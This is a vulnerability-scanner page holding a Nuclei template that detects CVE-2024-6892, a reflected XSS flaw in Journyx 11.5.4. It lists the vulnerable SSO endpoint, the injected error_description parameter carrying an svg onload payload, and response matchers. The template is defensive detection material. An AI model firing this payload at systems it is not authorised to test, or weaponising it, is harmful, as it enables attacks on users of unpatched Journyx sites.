Journyx 11.5.4 - Reflected Cross Site Scripting
ID: CVE-2024-6892
Severity: medium
Author: DhiyaneshDk
Tags: cve,cve2024,xss,journyx,seclists
Description
Section titled “Description”Attackers can craft a malicious link that once clicked will execute arbitrary JavaScript in the context of the Journyx web application.
YAML Source
Section titled “YAML Source”id: CVE-2024-6892
info: name: Journyx 11.5.4 - Reflected Cross Site Scripting author: DhiyaneshDk severity: medium description: | Attackers can craft a malicious link that once clicked will execute arbitrary JavaScript in the context of the Journyx web application. reference: - https://korelogic.com/Resources/Advisories/KL-001-2024-009.txt - http://seclists.org/fulldisclosure/2024/Aug/7 - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-6892 cwe-id: CWE-81,CWE-79 epss-score: 0.00046 epss-percentile: 0.19847 cpe: cpe:2.3:a:journyx:journyx:11.5.4:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: journyx product: journyx shodan-query: html:"Journyx" tags: cve,cve2024,xss,journyx,seclists
http: - raw: - | GET /jtcgi/r/adlogin/sso?code=1337&state=foobar&id_token=zoinks&error_description=%3Csvg%2fonload%3dprompt(%27document.domain%27)%3E&error=error HTTP/1.1 Host: {{Hostname}} Accept: */*
matchers-condition: and matchers: - type: word part: body words: - "<P>error <B><svg/onload=prompt('document.domain')></B></P>" - "journyx" condition: and case-insensitive: true
- type: word part: content_type words: - "text/html"# digest: 4a0a00473045022100deb7427aba8ccd907aaf0a74042aa2b26737cff93a358b9ced128e6b9902897c022005a843675474d0c73ccdcd94cbf59026fb47e05b6b1bbf4d5010b6d81d6179b8:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6892.yaml"